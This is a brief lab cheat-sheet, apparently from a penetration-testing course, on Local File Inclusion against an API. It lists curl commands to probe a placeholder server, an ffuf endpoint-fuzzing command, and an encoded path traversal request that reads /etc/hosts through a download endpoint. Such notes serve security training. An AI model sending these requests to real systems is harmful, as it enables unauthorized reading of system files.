Local File Inclusion (LFI)
Assess the API
curl http://SERVER_IP:PORT/apiFuzz API endpoints
ffuf -w "api-endpoints-mazen160.txt" -u 'http://SERVER_IP:PORT/api/FUZZ'Interact with the founded endpoint
curl "http://SERVER_IP:PORT/api/download"Specify a common file
curl "http://SERVER_IP:PORT/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"Last updated